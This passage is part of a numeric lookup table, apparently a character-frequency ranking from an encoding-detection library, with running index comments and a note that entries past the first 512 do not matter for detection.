1260,1436, 759,2255,1814,2150, 705,3235, 409,2563,3304, 561,3033,2005,2564, 726, # 1920
1956,2343,3698,4109, 949,3812,3813,3520,1669, 653,1379,2525, 881,2198, 632,2256, # 1936
1027, 778,1074, 733,1957, 514,1481,2466, 554,2180, 702,3938,1606,1017,1398,6129, # 1952
1380,3521, 921, 993,1313, 594, 449,1489,1617,1166, 768,1426,1360, 495,1794,3601, # 1968
1177,3602,1170,4320,2344, 476, 425,3167,4635,3168,1424, 401,2662,1171,3382,1998, # 1984
1089,4110, 477,3169, 474,6130,1909, 596,2831,1842, 494, 693,1051,1028,1207,3076, # 2000
606,2115, 727,2790,1473,1115, 743,3522, 630, 805,1532,4321,2021, 366,1057, 838, # 2016
684,1114,2142,4322,2050,1492,1892,1808,2271,3814,2424,1971,1447,1373,3305,1090, # 2032
1536,3939,3523,3306,1455,2199, 336, 369,2331,1035, 584,2393, 902, 718,2600,6131, # 2048
2753, 463,2151,1149,1611,2467, 715,1308,3124,1268, 343,1413,3236,1517,1347,2663, # 2064
2093,3940,2022,1131,1553,2100,2941,1427,3441,2942,1323,2484,6132,1980, 872,2368, # 2080
2441,2943, 320,2369,2116,1082, 679,1933,3941,2791,3815, 625,1143,2023, 422,2200, # 2096
3816,6133, 730,1695, 356,2257,1626,2301,2858,2637,1627,1778, 937, 883,2906,2693, # 2112
3002,1769,1086, 400,1063,1325,3307,2792,4111,3077, 456,2345,1046, 747,6134,1524, # 2128
884,1094,3383,1474,2164,1059, 974,1688,2181,2258,1047, 345,1665,1187, 358, 875, # 2144
3170, 305, 660,3524,2190,1334,1135,3171,1540,1649,2542,1527, 927, 968,2793, 885, # 2160
1972,1850, 482, 500,2638,1218,1109,1085,2543,1654,2034, 876, 78,2287,1482,1277, # 2176
861,1675,1083,1779, 724,2754, 454, 397,1132,1612,2332, 893, 672,1237, 257,2259, # 2192
2370, 135,3384, 337,2244, 547, 352, 340, 709,2485,1400, 788,1138,2511, 540, 772, # 2208
1682,2260,2272,2544,2013,1843,1902,4636,1999,1562,2288,4637,2201,1403,1533, 407, # 2224
576,3308,1254,2071, 978,3385, 170, 136,1201,3125,2664,3172,2394, 213, 912, 873, # 2240
3603,1713,2202, 699,3604,3699, 813,3442, 493, 531,1054, 468,2907,1483, 304, 281, # 2256
4112,1726,1252,2094, 339,2319,2130,2639, 756,1563,2944, 748, 571,2976,1588,2425, # 2272
2715,1851,1460,2426,1528,1392,1973,3237, 288,3309, 685,3386, 296, 892,2716,2216, # 2288
1570,2245, 722,1747,2217, 905,3238,1103,6135,1893,1441,1965, 251,1805,2371,3700, # 2304
2601,1919,1078, 75,2182,1509,1592,1270,2640,4638,2152,6136,3310,3817, 524, 706, # 2320
1075, 292,3818,1756,2602, 317, 98,3173,3605,3525,1844,2218,3819,2502, 814, 567, # 2336
385,2908,1534,6137, 534,1642,3239, 797,6138,1670,1529, 953,4323, 188,1071, 538, # 2352
178, 729,3240,2109,1226,1374,2000,2357,2977, 731,2468,1116,2014,2051,6139,1261, # 2368
1593, 803,2859,2736,3443, 556, 682, 823,1541,6140,1369,2289,1706,2794, 845, 462, # 2384
2603,2665,1361, 387, 162,2358,1740, 739,1770,1720,1304,1401,3241,1049, 627,1571, # 2400
2427,3526,1877,3942,1852,1500, 431,1910,1503, 677, 297,2795, 286,1433,1038,1198, # 2416
2290,1133,1596,4113,4639,2469,1510,1484,3943,6141,2442, 108, 712,4640,2372, 866, # 2432
3701,2755,3242,1348, 834,1945,1408,3527,2395,3243,1811, 824, 994,1179,2110,1548, # 2448
1453, 790,3003, 690,4324,4325,2832,2909,3820,1860,3821, 225,1748, 310, 346,1780, # 2464
2470, 821,1993,2717,2796, 828, 877,3528,2860,2471,1702,2165,2910,2486,1789, 453, # 2480
359,2291,1676, 73,1164,1461,1127,3311, 421, 604, 314,1037, 589, 116,2487, 737, # 2496
837,1180, 111, 244, 735,6142,2261,1861,1362, 986, 523, 418, 581,2666,3822, 103, # 2512
855, 503,1414,1867,2488,1091, 657,1597, 979, 605,1316,4641,1021,2443,2078,2001, # 2528
1209, 96, 587,2166,1032, 260,1072,2153, 173, 94, 226,3244, 819,2006,4642,4114, # 2544
2203, 231,1744, 782, 97,2667, 786,3387, 887, 391, 442,2219,4326,1425,6143,2694, # 2560
633,1544,1202, 483,2015, 592,2052,1958,2472,1655, 419, 129,4327,3444,3312,1714, # 2576
1257,3078,4328,1518,1098, 865,1310,1019,1885,1512,1734, 469,2444, 148, 773, 436, # 2592
1815,1868,1128,1055,4329,1245,2756,3445,2154,1934,1039,4643, 579,1238, 932,2320, # 2608
353, 205, 801, 115,2428, 944,2321,1881, 399,2565,1211, 678, 766,3944, 335,2101, # 2624
1459,1781,1402,3945,2737,2131,1010, 844, 981,1326,1013, 550,1816,1545,2620,1335, # 2640
1008, 371,2881, 936,1419,1613,3529,1456,1395,2273,1834,2604,1317,2738,2503, 416, # 2656
1643,4330, 806,1126, 229, 591,3946,1314,1981,1576,1837,1666, 347,1790, 977,3313, # 2672
764,2861,1853, 688,2429,1920,1462, 77, 595, 415,2002,3034, 798,1192,4115,6144, # 2688
2978,4331,3035,2695,2582,2072,2566, 430,2430,1727, 842,1396,3947,3702, 613, 377, # 2704
278, 236,1417,3388,3314,3174, 757,1869, 107,3530,6145,1194, 623,2262, 207,1253, # 2720
2167,3446,3948, 492,1117,1935, 536,1838,2757,1246,4332, 696,2095,2406,1393,1572, # 2736
3175,1782, 583, 190, 253,1390,2230, 830,3126,3389, 934,3245,1703,1749,2979,1870, # 2752
2545,1656,2204, 869,2346,4116,3176,1817, 496,1764,4644, 942,1504, 404,1903,1122, # 2768
1580,3606,2945,1022, 515, 372,1735, 955,2431,3036,6146,2797,1110,2302,2798, 617, # 2784
6147, 441, 762,1771,3447,3607,3608,1904, 840,3037, 86, 939,1385, 572,1370,2445, # 2800
1336, 114,3703, 898, 294, 203,3315, 703,1583,2274, 429, 961,4333,1854,1951,3390, # 2816
2373,3704,4334,1318,1381, 966,1911,2322,1006,1155, 309, 989, 458,2718,1795,1372, # 2832
1203, 252,1689,1363,3177, 517,1936, 168,1490, 562, 193,3823,1042,4117,1835, 551, # 2848
470,4645, 395, 489,3448,1871,1465,2583,2641, 417,1493, 279,1295, 511,1236,1119, # 2864
72,1231,1982,1812,3004, 871,1564, 984,3449,1667,2696,2096,4646,2347,2833,1673, # 2880
3609, 695,3246,2668, 807,1183,4647, 890, 388,2333,1801,1457,2911,1765,1477,1031, # 2896
3316,3317,1278,3391,2799,2292,2526, 163,3450,4335,2669,1404,1802,6148,2323,2407, # 2912
1584,1728,1494,1824,1269, 298, 909,3318,1034,1632, 375, 776,1683,2061, 291, 210, # 2928
1123, 809,1249,1002,2642,3038, 206,1011,2132, 144, 975, 882,1565, 342, 667, 754, # 2944
1442,2143,1299,2303,2062, 447, 626,2205,1221,2739,2912,1144,1214,2206,2584, 760, # 2960
1715, 614, 950,1281,2670,2621, 810, 577,1287,2546,4648, 242,2168, 250,2643, 691, # 2976
123,2644, 647, 313,1029, 689,1357,2946,1650, 216, 771,1339,1306, 808,2063, 549, # 2992
913,1371,2913,2914,6149,1466,1092,1174,1196,1311,2605,2396,1783,1796,3079, 406, # 3008
2671,2117,3949,4649, 487,1825,2220,6150,2915, 448,2348,1073,6151,2397,1707, 130, # 3024
900,1598, 329, 176,1959,2527,1620,6152,2275,4336,3319,1983,2191,3705,3610,2155, # 3040
3706,1912,1513,1614,6153,1988, 646, 392,2304,1589,3320,3039,1826,1239,1352,1340, # 3056
2916, 505,2567,1709,1437,2408,2547, 906,6154,2672, 384,1458,1594,1100,1329, 710, # 3072
423,3531,2064,2231,2622,1989,2673,1087,1882, 333, 841,3005,1296,2882,2379, 580, # 3088
1937,1827,1293,2585, 601, 574, 249,1772,4118,2079,1120, 645, 901,1176,1690, 795, # 3104
2207, 478,1434, 516,1190,1530, 761,2080, 930,1264, 355, 435,1552, 644,1791, 987, # 3120
220,1364,1163,1121,1538, 306,2169,1327,1222, 546,2645, 218, 241, 610,1704,3321, # 3136
1984,1839,1966,2528, 451,6155,2586,3707,2568, 907,3178, 254,2947, 186,1845,4650, # 3152
745, 432,1757, 428,1633, 888,2246,2221,2489,3611,2118,1258,1265, 956,3127,1784, # 3168
4337,2490, 319, 510, 119, 457,3612, 274,2035,2007,4651,1409,3128, 970,2758, 590, # 3184
2800, 661,2247,4652,2008,3950,1420,1549,3080,3322,3951,1651,1375,2111, 485,2491, # 3200
1429,1156,6156,2548,2183,1495, 831,1840,2529,2446, 501,1657, 307,1894,3247,1341, # 3216
666, 899,2156,1539,2549,1559, 886, 349,2208,3081,2305,1736,3824,2170,2759,1014, # 3232
1913,1386, 542,1397,2948, 490, 368, 716, 362, 159, 282,2569,1129,1658,1288,1750, # 3248
2674, 276, 649,2016, 751,1496, 658,1818,1284,1862,2209,2087,2512,3451, 622,2834, # 3264
376, 117,1060,2053,1208,1721,1101,1443, 247,1250,3179,1792,3952,2760,2398,3953, # 3280
6157,2144,3708, 446,2432,1151,2570,3452,2447,2761,2835,1210,2448,3082, 424,2222, # 3296
1251,2449,2119,2836, 504,1581,4338, 602, 817, 857,3825,2349,2306, 357,3826,1470, # 3312
1883,2883, 255, 958, 929,2917,3248, 302,4653,1050,1271,1751,2307,1952,1430,2697, # 3328
2719,2359, 354,3180, 777, 158,2036,4339,1659,4340,4654,2308,2949,2248,1146,2232, # 3344
3532,2720,1696,2623,3827,6158,3129,1550,2698,1485,1297,1428, 637, 931,2721,2145, # 3360
914,2550,2587, 81,2450, 612, 827,2646,1242,4655,1118,2884, 472,1855,3181,3533, # 3376
3534, 569,1353,2699,1244,1758,2588,4119,2009,2762,2171,3709,1312,1531,6159,1152, # 3392
1938, 134,1830, 471,3710,2276,1112,1535,3323,3453,3535, 982,1337,2950, 488, 826, # 3408
674,1058,1628,4120,2017, 522,2399, 211, 568,1367,3454, 350, 293,1872,1139,3249, # 3424
1399,1946,3006,1300,2360,3324, 588, 736,6160,2606, 744, 669,3536,3828,6161,1358, # 3440
199, 723, 848, 933, 851,1939,1505,1514,1338,1618,1831,4656,1634,3613, 443,2740, # 3456
3829, 717,1947, 491,1914,6162,2551,1542,4121,1025,6163,1099,1223, 198,3040,2722, # 3472
370, 410,1905,2589, 998,1248,3182,2380, 519,1449,4122,1710, 947, 928,1153,4341, # 3488
2277, 344,2624,1511, 615, 105, 161,1212,1076,1960,3130,2054,1926,1175,1906,2473, # 3504
414,1873,2801,6164,2309, 315,1319,3325, 318,2018,2146,2157, 963, 631, 223,4342, # 3520
4343,2675, 479,3711,1197,2625,3712,2676,2361,6165,4344,4123,6166,2451,3183,1886, # 3536
2184,1674,1330,1711,1635,1506, 799, 219,3250,3083,3954,1677,3713,3326,2081,3614, # 3552
1652,2073,4657,1147,3041,1752, 643,1961, 147,1974,3955,6167,1716,2037, 918,3007, # 3568
1994, 120,1537, 118, 609,3184,4345, 740,3455,1219, 332,1615,3830,6168,1621,2980, # 3584
1582, 783, 212, 553,2350,3714,1349,2433,2082,4124, 889,6169,2310,1275,1410, 973, # 3600
166,1320,3456,1797,1215,3185,2885,1846,2590,2763,4658, 629, 822,3008, 763, 940, # 3616
1990,2862, 439,2409,1566,1240,1622, 926,1282,1907,2764, 654,2210,1607, 327,1130, # 3632
3956,1678,1623,6170,2434,2192, 686, 608,3831,3715, 903,3957,3042,6171,2741,1522, # 3648
1915,1105,1555,2552,1359, 323,3251,4346,3457, 738,1354,2553,2311,2334,1828,2003, # 3664
3832,1753,2351,1227,6172,1887,4125,1478,6173,2410,1874,1712,1847, 520,1204,2607, # 3680
264,4659, 836,2677,2102, 600,4660,3833,2278,3084,6174,4347,3615,1342, 640, 532, # 3696
543,2608,1888,2400,2591,1009,4348,1497, 341,1737,3616,2723,1394, 529,3252,1321, # 3712
983,4661,1515,2120, 971,2592, 924, 287,1662,3186,4349,2700,4350,1519, 908,1948, # 3728
2452, 156, 796,1629,1486,2223,2055, 694,4126,1259,1036,3392,1213,2249,2742,1889, # 3744
1230,3958,1015, 910, 408, 559,3617,4662, 746, 725, 935,4663,3959,3009,1289, 563, # 3760
867,4664,3960,1567,2981,2038,2626, 988,2263,2381,4351, 143,2374, 704,1895,6175, # 3776
1188,3716,2088, 673,3085,2362,4352, 484,1608,1921,2765,2918, 215, 904,3618,3537, # 3792
894, 509, 976,3043,2701,3961,4353,2837,2982, 498,6176,6177,1102,3538,1332,3393, # 3808
1487,1636,1637, 233, 245,3962, 383, 650, 995,3044, 460,1520,1206,2352, 749,3327, # 3824
530, 700, 389,1438,1560,1773,3963,2264, 719,2951,2724,3834, 870,1832,1644,1000, # 3840
839,2474,3717, 197,1630,3394, 365,2886,3964,1285,2133, 734, 922, 818,1106, 732, # 3856
480,2083,1774,3458, 923,2279,1350, 221,3086, 85,2233,2234,3835,1585,3010,2147, # 3872
1387,1705,2382,1619,2475, 133, 239,2802,1991,1016,2084,2383, 411,2838,1113, 651, # 3888
1985,1160,3328, 990,1863,3087,1048,1276,2647, 265,2627,1599,3253,2056, 150, 638, # 3904
2019, 656, 853, 326,1479, 680,1439,4354,1001,1759, 413,3459,3395,2492,1431, 459, # 3920
4355,1125,3329,2265,1953,1450,2065,2863, 849, 351,2678,3131,3254,3255,1104,1577, # 3936
227,1351,1645,2453,2193,1421,2887, 812,2121, 634, 95,2435, 201,2312,4665,1646, # 3952
1671,2743,1601,2554,2702,2648,2280,1315,1366,2089,3132,1573,3718,3965,1729,1189, # 3968
328,2679,1077,1940,1136, 558,1283, 964,1195, 621,2074,1199,1743,3460,3619,1896, # 3984
1916,1890,3836,2952,1154,2112,1064, 862, 378,3011,2066,2113,2803,1568,2839,6178, # 4000
3088,2919,1941,1660,2004,1992,2194, 142, 707,1590,1708,1624,1922,1023,1836,1233, # 4016
1004,2313, 789, 741,3620,6179,1609,2411,1200,4127,3719,3720,4666,2057,3721, 593, # 4032
2840, 367,2920,1878,6180,3461,1521, 628,1168, 692,2211,2649, 300, 720,2067,2571, # 4048
2953,3396, 959,2504,3966,3539,3462,1977, 701,6181, 954,1043, 800, 681, 183,3722, # 4064
1803,1730,3540,4128,2103, 815,2314, 174, 467, 230,2454,1093,2134, 755,3541,3397, # 4080
1141,1162,6182,1738,2039, 270,3256,2513,1005,1647,2185,3837, 858,1679,1897,1719, # 4096
2954,2324,1806, 402, 670, 167,4129,1498,2158,2104, 750,6183, 915, 189,1680,1551, # 4112
455,4356,1501,2455, 405,1095,2955, 338,1586,1266,1819, 570, 641,1324, 237,1556, # 4128
2650,1388,3723,6184,1368,2384,1343,1978,3089,2436, 879,3724, 792,1191, 758,3012, # 4144
1411,2135,1322,4357, 240,4667,1848,3725,1574,6185, 420,3045,1546,1391, 714,4358, # 4160
1967, 941,1864, 863, 664, 426, 560,1731,2680,1785,2864,1949,2363, 403,3330,1415, # 4176
1279,2136,1697,2335, 204, 721,2097,3838, 90,6186,2085,2505, 191,3967, 124,2148, # 4192
1376,1798,1178,1107,1898,1405, 860,4359,1243,1272,2375,2983,1558,2456,1638, 113, # 4208
3621, 578,1923,2609, 880, 386,4130, 784,2186,2266,1422,2956,2172,1722, 497, 263, # 4224
2514,1267,2412,2610, 177,2703,3542, 774,1927,1344, 616,1432,1595,1018, 172,4360, # 4240
2325, 911,4361, 438,1468,3622, 794,3968,2024,2173,1681,1829,2957, 945, 895,3090, # 4256
575,2212,2476, 475,2401,2681, 785,2744,1745,2293,2555,1975,3133,2865, 394,4668, # 4272
3839, 635,4131, 639, 202,1507,2195,2766,1345,1435,2572,3726,1908,1184,1181,2457, # 4288
3727,3134,4362, 843,2611, 437, 916,4669, 234, 769,1884,3046,3047,3623, 833,6187, # 4304
1639,2250,2402,1355,1185,2010,2047, 999, 525,1732,1290,1488,2612, 948,1578,3728, # 4320
2413,2477,1216,2725,2159, 334,3840,1328,3624,2921,1525,4132, 564,1056, 891,4363, # 4336
1444,1698,2385,2251,3729,1365,2281,2235,1717,6188, 864,3841,2515, 444, 527,2767, # 4352
2922,3625, 544, 461,6189, 566, 209,2437,3398,2098,1065,2068,3331,3626,3257,2137, # 4368 #last 512
#Everything below is of no interest for detection purpose
2138,2122,3730,2888,1995,1820,1044,6190,6191,6192,6193,6194,6195,6196,6197,6198, # 4384
6199,6200,6201,6202,6203,6204,6205,4670,6206,6207,6208,6209,6210,6211,6212,6213, # 4400
6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,6224,6225,6226,6227,6228,6229, # 4416
6230,6231,6232,6233,6234,6235,6236,6237,3187,6238,6239,3969,6240,6241,6242,6243, # 4432
6244,4671,6245,6246,4672,6247,6248,4133,6249,6250,4364,6251,2923,2556,2613,4673, # 4448
4365,3970,6252,6253,6254,6255,4674,6256,6257,6258,2768,2353,4366,4675,4676,3188, # 4464
4367,3463,6259,4134,4677,4678,6260,2267,6261,3842,3332,4368,3543,6262,6263,6264, # 4480
3013,1954,1928,4135,4679,6265,6266,2478,3091,6267,4680,4369,6268,6269,1699,6270, # 4496
3544,4136,4681,6271,4137,6272,4370,2804,6273,6274,2593,3971,3972,4682,6275,2236, # 4512
4683,6276,6277,4684,6278,6279,4138,3973,4685,6280,6281,3258,6282,6283,6284,6285, # 4528
3974,4686,2841,3975,6286,6287,3545,6288,6289,4139,4687,4140,6290,4141,6291,4142, # 4544
6292,6293,3333,6294,6295,6296,4371,6297,3399,6298,6299,4372,3976,6300,6301,6302, # 4560
4373,6303,6304,3843,3731,6305,4688,4374,6306,6307,3259,2294,6308,3732,2530,4143, # 4576
6309,4689,6310,6311,6312,3048,6313,6314,4690,3733,2237,6315,6316,2282,3334,6317, # 4592
6318,3844,6319,6320,4691,6321,3400,4692,6322,4693,6323,3049,6324,4375,6325,3977, # 4608
6326,6327,6328,3546,6329,4694,3335,6330,4695,4696,6331,6332,6333,6334,4376,3978, # 4624
6335,4697,3979,4144,6336,3980,4698,6337,6338,6339,6340,6341,4699,4700,4701,6342, # 4640
6343,4702,6344,6345,4703,6346,6347,4704,6348,4705,4706,3135,6349,4707,6350,4708, # 4656
6351,4377,6352,4709,3734,4145,6353,2506,4710,3189,6354,3050,4711,3981,6355,3547, # 4672
3014,4146,4378,3735,2651,3845,3260,3136,2224,1986,6356,3401,6357,4712,2594,3627, # 4688
3137,2573,3736,3982,4713,3628,4714,4715,2682,3629,4716,6358,3630,4379,3631,6359, # 4704
6360,6361,3983,6362,6363,6364,6365,4147,3846,4717,6366,6367,3737,2842,6368,4718, # 4720
2628,6369,3261,6370,2386,6371,6372,3738,3984,4719,3464,4720,3402,6373,2924,3336, # 4736
4148,2866,6374,2805,3262,4380,2704,2069,2531,3138,2806,2984,6375,2769,6376,4721, # 4752
4722,3403,6377,6378,3548,6379,6380,2705,3092,1979,4149,2629,3337,2889,6381,3338, # 4768
4150,2557,3339,4381,6382,3190,3263,3739,6383,4151,4723,4152,2558,2574,3404,3191, # 4784
6384,6385,4153,6386,4724,4382,6387,6388,4383,6389,6390,4154,6391,4725,3985,6392, # 4800
3847,4155,6393,6394,6395,6396,6397,3465,6398,4384,6399,6400,6401,6402,6403,6404, # 4816
4156,6405,6406,6407,6408,2123,6409,6410,2326,3192,4726,6411,6412,6413,6414,4385, # 4832
4157,6415,6416,4158,6417,3093,3848,6418,3986,6419,6420,3849,6421,6422,6423,4159, # 4848
6424,6425,4160,6426,3740,6427,6428,6429,6430,3987,6431,4727,6432,2238,6433,6434, # 4864
4386,3988,6435,6436,3632,6437,6438,2843,6439,6440,6441,6442,3633,6443,2958,6444, # 4880
6445,3466,6446,2364,4387,3850,6447,4388,2959,3340,6448,3851,6449,4728,6450,6451, # 4896
3264,4729,6452,3193,6453,4389,4390,2706,3341,4730,6454,3139,6455,3194,6456,3051, # 4912
2124,3852,1602,4391,4161,3853,1158,3854,4162,3989,4392,3990,4731,4732,4393,2040, # 4928
4163,4394,3265,6457,2807,3467,3855,6458,6459,6460,3991,3468,4733,4734,6461,3140, # 4944
2960,6462,4735,6463,6464,6465,6466,4736,4737,4738,4739,6467,6468,4164,2403,3856, # 4960
6469,6470,2770,2844,6471,4740,6472,6473,6474,6475,6476,6477,6478,3195,6479,4741, # 4976
4395,6480,2867,6481,4742,2808,6482,2493,4165,6483,6484,6485,6486,2295,4743,6487, # 4992
6488,6489,3634,6490,6491,6492,6493,6494,6495,6496,2985,4744,6497,6498,4745,6499, # 5008
6500,2925,3141,4166,6501,6502,4746,6503,6504,4747,6505,6506,6507,2890,6508,6509, # 5024
6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,3469,4167,6520,6521,6522,4748, # 5040
4396,3741,4397,4749,4398,3342,2125,4750,6523,4751,4752,4753,3052,6524,2961,4168, # 5056
6525,4754,6526,4755,4399,2926,4169,6527,3857,6528,4400,4170,6529,4171,6530,6531, # 5072
2595,6532,6533,6534,6535,3635,6536,6537,6538,6539,6540,6541,6542,4756,6543,6544, # 5088
6545,6546,6547,6548,4401,6549,6550,6551,6552,4402,3405,4757,4403,6553,6554,6555, # 5104
4172,3742,6556,6557,6558,3992,3636,6559,6560,3053,2726,6561,3549,4173,3054,4404, # 5120
6562,6563,3993,4405,3266,3550,2809,4406,6564,6565,6566,4758,4759,6567,3743,6568, # 5136
4760,3744,4761,3470,6569,6570,6571,4407,6572,3745,4174,6573,4175,2810,4176,3196, # 5152
4762,6574,4177,6575,6576,2494,2891,3551,6577,6578,3471,6579,4408,6580,3015,3197, # 5168
6581,3343,2532,3994,3858,6582,3094,3406,4409,6583,2892,4178,4763,4410,3016,4411, # 5184
6584,3995,3142,3017,2683,6585,4179,6586,6587,4764,4412,6588,6589,4413,6590,2986, # 5200
6591,2962,3552,6592,2963,3472,6593,6594,4180,4765,6595,6596,2225,3267,4414,6597, # 5216
3407,3637,4766,6598,6599,3198,6600,4415,6601,3859,3199,6602,3473,4767,2811,4416, # 5232
1856,3268,3200,2575,3996,3997,3201,4417,6603,3095,2927,6604,3143,6605,2268,6606, # 5248
3998,3860,3096,2771,6607,6608,3638,2495,4768,6609,3861,6610,3269,2745,4769,4181, # 5264
3553,6611,2845,3270,6612,6613,6614,3862,6615,6616,4770,4771,6617,3474,3999,4418, # 5280
4419,6618,3639,3344,6619,4772,4182,6620,2126,6621,6622,6623,4420,4773,6624,3018, # 5296
6625,4774,3554,6626,4183,2025,3746,6627,4184,2707,6628,4421,4422,3097,1775,4185, # 5312
3555,6629,6630,2868,6631,6632,4423,6633,6634,4424,2414,2533,2928,6635,4186,2387, # 5328
6636,4775,6637,4187,6638,1891,4425,3202,3203,6639,6640,4776,6641,3345,6642,6643, # 5344
3640,6644,3475,3346,3641,4000,6645,3144,6646,3098,2812,4188,3642,3204,6647,3863, # 5360
3476,6648,3864,6649,4426,4001,6650,6651,6652,2576,6653,4189,4777,6654,6655,6656, # 5376
2846,6657,3477,3205,4002,6658,4003,6659,3347,2252,6660,6661,6662,4778,6663,6664, # 5392
6665,6666,6667,6668,6669,4779,4780,2048,6670,3478,3099,6671,3556,3747,4004,6672, # 5408
6673,6674,3145,4005,3748,6675,6676,6677,6678,6679,3408,6680,6681,6682,6683,3206, # 5424
3207,6684,6685,4781,4427,6686,4782,4783,4784,6687,6688,6689,4190,6690,6691,3479, # 5440
6692,2746,6693,4428,6694,6695,6696,6697,6698,6699,4785,6700,6701,3208,2727,6702, # 5456
3146,6703,6704,3409,2196,6705,4429,6706,6707,6708,2534,1996,6709,6710,6711,2747, # 5472
6712,6713,6714,4786,3643,6715,4430,4431,6716,3557,6717,4432,4433,6718,6719,6720, # 5488
6721,3749,6722,4006,4787,6723,6724,3644,4788,4434,6725,6726,4789,2772,6727,6728, # 5504
6729,6730,6731,2708,3865,2813,4435,6732,6733,4790,4791,3480,6734,6735,6736,6737, # 5520
4436,3348,6738,3410,4007,6739,6740,4008,6741,6742,4792,3411,4191,6743,6744,6745, # 5536
6746,6747,3866,6748,3750,6749,6750,6751,6752,6753,6754,6755,3867,6756,4009,6757, # 5552
4793,4794,6758,2814,2987,6759,6760,6761,4437,6762,6763,6764,6765,3645,6766,6767, # 5568
3481,4192,6768,3751,6769,6770,2174,6771,3868,3752,6772,6773,6774,4193,4795,4438, # 5584
3558,4796,4439,6775,4797,6776,6777,4798,6778,4799,3559,4800,6779,6780,6781,3482, # 5600
6782,2893,6783,6784,4194,4801,4010,6785,6786,4440,6787,4011,6788,6789,6790,6791, # 5616
6792,6793,4802,6794,6795,6796,4012,6797,6798,6799,6800,3349,4803,3483,6801,4804, # 5632
4195,6802,4013,6803,6804,4196,6805,4014,4015,6806,2847,3271,2848,6807,3484,6808, # 5648
6809,6810,4441,6811,4442,4197,4443,3272,4805,6812,3412,4016,1579,6813,6814,4017, # 5664
6815,3869,6816,2964,6817,4806,6818,6819,4018,3646,6820,6821,4807,4019,4020,6822, # 5680
6823,3560,6824,6825,4021,4444,6826,4198,6827,6828,4445,6829,6830,4199,4808,6831, # 5696
6832,6833,3870,3019,2458,6834,3753,3413,3350,6835,4809,3871,4810,3561,4446,6836, # 5712
6837,4447,4811,4812,6838,2459,4448,6839,4449,6840,6841,4022,3872,6842,4813,4814, # 5728
6843,6844,4815,4200,4201,4202,6845,4023,6846,6847,4450,3562,3873,6848,6849,4816, # 5744
4817,6850,4451,4818,2139,6851,3563,6852,6853,3351,6854,6855,3352,4024,2709,3414, # 5760
4203,4452,6856,4204,6857,6858,3874,3875,6859,6860,4819,6861,6862,6863,6864,4453, # 5776
3647,6865,6866,4820,6867,6868,6869,6870,4454,6871,2869,6872,6873,4821,6874,3754, # 5792
6875,4822,4205,6876,6877,6878,3648,4206,4455,6879,4823,6880,4824,3876,6881,3055, # 5808
4207,6882,3415,6883,6884,6885,4208,4209,6886,4210,3353,6887,3354,3564,3209,3485, # 5824
2652,6888,2728,6889,3210,3755,6890,4025,4456,6891,4825,6892,6893,6894,6895,4211, # 5840
6896,6897,6898,4826,6899,6900,4212,6901,4827,6902,2773,3565,6903,4828,6904,6905, # 5856
6906,6907,3649,3650,6908,2849,3566,6909,3567,3100,6910,6911,6912,6913,6914,6915, # 5872
4026,6916,3355,4829,3056,4457,3756,6917,3651,6918,4213,3652,2870,6919,4458,6920, # 5888
2438,6921,6922,3757,2774,4830,6923,3356,4831,4832,6924,4833,4459,3653,2507,6925, # 5904
4834,2535,6926,6927,3273,4027,3147,6928,3568,6929,6930,6931,4460,6932,3877,4461, # 5920
2729,3654,6933,6934,6935,6936,2175,4835,2630,4214,4028,4462,4836,4215,6937,3148, # 5936
4216,4463,4837,4838,4217,6938,6939,2850,4839,6940,4464,6941,6942,6943,4840,6944, # 5952
4218,3274,4465,6945,6946,2710,6947,4841,4466,6948,6949,2894,6950,6951,4842,6952, # 5968
4219,3057,2871,6953,6954,6955,6956,4467,6957,2711,6958,6959,6960,3275,3101,4843, # 5984
6961,3357,3569,6962,4844,6963,6964,4468,4845,3570,6965,3102,4846,3758,6966,4847, # 6000
3878,4848,4849,4029,6967,2929,3879,4850,4851,6968,6969,1733,6970,4220,6971,6972, # 6016
6973,6974,6975,6976,4852,6977,6978,6979,6980,6981,6982,3759,6983,6984,6985,3486, # 6032
3487,6986,3488,3416,6987,6988,6989,6990,6991,6992,6993,6994,6995,6996,6997,4853, # 6048
6998,6999,4030,7000,7001,3211,7002,7003,4221,7004,7005,3571,4031,7006,3572,7007, # 6064
2614,4854,2577,7008,7009,2965,3655,3656,4855,2775,3489,3880,4222,4856,3881,4032, # 6080
3882,3657,2730,3490,4857,7010,3149,7011,4469,4858,2496,3491,4859,2283,7012,7013, # 6096
7014,2365,4860,4470,7015,7016,3760,7017,7018,4223,1917,7019,7020,7021,4471,7022, # 6112
2776,4472,7023,7024,7025,7026,4033,7027,3573,4224,4861,4034,4862,7028,7029,1929, # 6128
3883,4035,7030,4473,3058,7031,2536,3761,3884,7032,4036,7033,2966,2895,1968,4474, # 6144
3276,4225,3417,3492,4226,2105,7034,7035,1754,2596,3762,4227,4863,4475,3763,4864, # 6160
3764,2615,2777,3103,3765,3658,3418,4865,2296,3766,2815,7036,7037,7038,3574,2872, # 6176
3277,4476,7039,4037,4477,7040,7041,4038,7042,7043,7044,7045,7046,7047,2537,7048, # 6192
7049,7050,7051,7052,7053,7054,4478,7055,7056,3767,3659,4228,3575,7057,7058,4229, # 6208
7059,7060,7061,3660,7062,3212,7063,3885,4039,2460,7064,7065,7066,7067,7068,7069, # 6224
7070,7071,7072,7073,7074,4866,3768,4867,7075,7076,7077,7078,4868,3358,3278,2653, # 6240
7079,7080,4479,3886,7081,7082,4869,7083,7084,7085,7086,7087,7088,2538,7089,7090, # 6256
7091,4040,3150,3769,4870,4041,2896,3359,4230,2930,7092,3279,7093,2967,4480,3213, # 6272
4481,3661,7094,7095,7096,7097,7098,7099,7100,7101,7102,2461,3770,7103,7104,4231, # 6288
3151,7105,7106,7107,4042,3662,7108,7109,4871,3663,4872,4043,3059,7110,7111,7112, # 6304
3493,2988,7113,4873,7114,7115,7116,3771,4874,7117,7118,4232,4875,7119,3576,2336, # 6320
4876,7120,4233,3419,4044,4877,4878,4482,4483,4879,4484,4234,7121,3772,4880,1045, # 6336
3280,3664,4881,4882,7122,7123,7124,7125,4883,7126,2778,7127,4485,4486,7128,4884, # 6352
3214,3887,7129,7130,3215,7131,4885,4045,7132,7133,4046,7134,7135,7136,7137,7138, # 6368
7139,7140,7141,7142,7143,4235,7144,4886,7145,7146,7147,4887,7148,7149,7150,4487, # 6384
4047,4488,7151,7152,4888,4048,2989,3888,7153,3665,7154,4049,7155,7156,7157,7158, # 6400
7159,7160,2931,4889,4890,4489,7161,2631,3889,4236,2779,7162,7163,4891,7164,3060, # 6416
7165,1672,4892,7166,4893,4237,3281,4894,7167,7168,3666,7169,3494,7170,7171,4050, # 6432
